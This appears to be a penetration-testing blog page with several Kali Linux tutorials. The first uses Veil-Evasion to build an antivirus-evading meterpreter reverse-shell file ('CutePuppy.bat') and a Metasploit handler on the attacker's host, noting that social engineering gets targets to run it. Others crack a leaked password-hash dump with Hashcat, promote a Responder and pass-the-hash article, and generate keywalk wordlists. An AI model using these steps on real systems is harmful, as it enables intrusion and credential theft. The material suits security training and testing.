Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements

Cracking Passwords up to 256 Characters with Hashcat

Think your 12 character passwords are still strong enough? One of the top password cracking programs can now crack password up to 256 characters!

The 4.x release of Hashcat blows through the previous 32 character password cracking limit and can now crack up to 256 character passwords. It has been very helpful for working through Troy Hunt’s half a billion password hash release.

If you use the default or -w1 speed switch in Hashcat, it will now crack passwords up to 256 characters:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -w1 –gpu-temp-retain 75

hashcat long passwords1

If you use the -O switch, Hashcat will crack at a much faster rate, but will only be able to crack the traditional 32 and under length hashes:

hashcat long passwords2

As seen in the command below:

hashcat64 -D 2 –remove -m 100 massiveleak.txt rockyou.txt -o MassiveLeakCracked.txt -r rules/d3ad0ne.rule -O –gpu-temp-retain 75

Here are some of the large passwords (most likely unintentional junk) found in Troy Hunt’s 500 Million “Have I been Pwned” SHA1 password hash release:

24пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ

ðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅðíðÅ

&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:&#9679:

12345РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…РїС—Р…

greens and water shine a place where a word friends speak to a thicket:

mihunol:||smtp.zdcd.pn||25||dfslgosa@wa!t.mccdonald@dtfafod307@xzwt.rg:toothyfe:||smtp.zdct.jrg||25||fhwjw307@fgrw.rd||dalecandrobotis@cab.rt:stanmattefel

* The last one could have possibly contained actual account information so the website name and possible account information has been altered, but the style, layout and length have remained the same.

All of the passwords above except for one were recovered from using wordlists and rules together, so similar passwords were already in the wordlist. One was recovered by just daisy chaining together multiple repetitive binary strings.

There are some other odd returns found in the cracked hashes, ones that looked something similar to these:

  • $HEX[ab32d4c1334455]d]9]
  • $HEX[abcbdb1212121212]4]f6d]

I have never seen Hashcat do that before, but when they were decoded from Hex to Ascii they looked about right.

There are also a lot of jumbled together lines that include partial e-mails & passwords together. Some even include what appear to be phone numbers and outdated credit cards (any personal information has already been publicly dumped, some of it for years). Obviously, these weren’t used as passwords, but is just some of the malformed data mentioned on Troy’s blog. Some of these lines are extremely long, so it is impressive that Hashcat is able to recover them.

I am still working through the list, I’m just using a single GTX960 card so it is taking a while, but during the process I found Not so Secure’s “OneRuletoRuleThemAll” Hashcat rule extremely useful.

Thanks to Troy Hunt for releasing the 500 million password dump. As a security trainer, it is a lot of fun and great practice to run through the dump using Hashcat. Also, thanks for his work on the “Have I Been Pwned” website. If you want to see if any of your accounts are included in the dump, just visit the Have I Been Pwned Website.

If you need to crack very long complex passwords, give Hashcat a try!

NetHunter Article Featured in Hakin9 Magazine

The latest Hakin9 Magazine is out! This issue is all about Android security and features my article on using Kali NetHunter and Responder together for getting quick user credentials.

Front Cover

In my article I explain how you could recover network credentials from a Windows network using the Android based Kali NetHunter and Responder (an LLMNR, NBT-NS & MDNS poisoner). I also show how you can “pass the hash” with credentials obtained and gain remote shell access to an unsecured or improperly secured Windows Server.

Other Articles in this Issue Include:

Mobile Penetration Testing Tutorial

by Olivia Orr

The objective of this tutorial is to learn the most common vulnerabilities in mobile applications using an app intentionally designed to be insecure. This tutorial will be based on the Windows platform, but you can use other systems if you wish.


Quick Android Review Kit (QARK) – A comrade for Android security analysis

by Vinayak Joshi and Venkatesh Sivakumar (Pranav Venkat)

QARK stands for Quick Android Review Kit. A quirky companion to get the hidden potential vulnerabilities of any Android applications. It is an open community tool designed to assist mobile application security pentesters to leverage its capabilities to reverse engineer mobile applications and conduct static analysis on the hidden vulnerabilities that can potentially create critical breaches. This article will explain how to use it.


Peeping Inside Android Applications: Reverse Engineering with Androguard

by Ajit Kumar

Reverse engineering is one of the ways to find out what’s inside of any Android applications; it also helps developers to learn, test and debug their and applications as well as applications written by others. Reverse engineering is a complex and cumbersome task, so tools like Androguard make this task automated and hence ease the job of reverse engineers. This tutorial provides a brief introduction of Androguard, explains various tools available inside Androguard and provides some examples of basic reverse engineering with Androguard.

And much more, check it out!

Creating Hashcat Keymap Walking Password Wordlists

Hashcat’s latest keymap walking tool, “KwProcessor”, quickly and easily generates password lists based on keymap walking techniques. In this article, the first of several password cracking themed articles, we will take a quick look at how to use this tool.

Introduction

Keymap walking passwords are popular amongst many organizations as they are pretty easy to use and remember. Basically, you start with a specific key on the keyboard and then pick a direction (or multiple directions) and start hitting keys. Your password is entered as you “walk” across the keyboard.

You can create a complex password in this manner by using the shift key and including numbers in the pattern, as seen below:

 hashcat_wordlist

Starting with the letter “z”, we move North West, hitting the “a”,”q”, and “1” keys. We then move East a row, hitting the number “2”, and then move South East back down the keyboard hitting the “w” key and stopping on “s”.

This would create the password, “zaq12ws”. If we alternately used the shift key, we would get the password, “ZaQ1@wS” which is a little more complex.

What makes keymap walking so successful (until now) is that an attacker would need to know the starting key, direction, direction changes, if any special key is used and when, and of course the ending key.  Hashcat’s new KwProcessor tool makes creating keymap walking wordlists very easy to do.

Installing KwProcessor (kwp)

We will be using Kali Linux as the operating system. At the time of this writing kwp is not installed by default. So, we will need to download and install it.

From a Kali Terminal prompt:

As seen below:

hashcat_keymap_walking2

You can type, “./kwp -V” to check that it installed correctly and display the software version.

Keymaps and Routes

To crack keymap walking passwords you will need two things, a layout of the keyboard keys and a list of routes to take to create the wordlists. In the kwp program directory you will find the “keymaps” and “routes” folders:

hashcat_keymap_walking3

The Keymaps folder contains the keyboard layout for multiple languages:

hashcat_keymap_walking4

The routes folder has 7 preconfigured keymap walks or routes that can be used to generate passwords:

hashcat_keymap_walking5

We can use these preconfigured routes or create our own using command line switches.

Type, “./kwp –help” to see the available options:

hashcat_keymap_walking6

Creating a KWP Wordlist

To create a simple kwp wordlist, we will use the English keymap and the 2-10 max 3 directional change route file. This can be accomplished by running the command below:

./kwp basechars/full.base keymaps/en.keymap routes/2-to-10-max-3-direction-changes.route

This causes kwp to create multiple keymap walk combinations, of 2-11 characters with a maximum of 3 direction changes:

hashcat_keymap_walking7

The output of the command is sent directly to the screen, so to create the actual wordlist file, you would need to output the command to a text file.

./kwp basechars/full.base keymaps/en.keymap routes/2-to-10-max-3-direction-changes.route > basickwp.txt

You can then use the resultant text file as a wordlist in Hashcat.

To create a more complex wordlist, use one of the larger route files:

./kwp basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route > largekwp.txt

hashcat_keymap_walking8

Foreign Language Keywalks

If you need to crack foreign language keywalks, just use one of the foreign language keymap files.  So, to create a Russian keywalk wordlist:

./kwp basechars/full.base keymaps/ru.keymap routes/2-to-16-max-3-direction-changes.route > rukwp.txt

And the resultant file:

hashcat_keymap_walking9

If we have a password hashlist that contains any of the words that were generated, it will crack them. This is shown in the Hashcat result example below:

hashcat_keymap_walking10

Conclusion

In this article we covered how to use the new Hashcat kwp tool to quickly create keymap walking wordlists. We also saw how easy it is to change the keymap language, which can come in handy if you are cracking international passwords. For more information on KWP, check out the Hashcat Github page.

If you are interested in learning more about cracking password with Hashcat, more is on the way in upcoming articles. Also, check out my Basic Security Testing with Kali Linux book that covers a lot of basic password cracking topics, plus a whole lot more!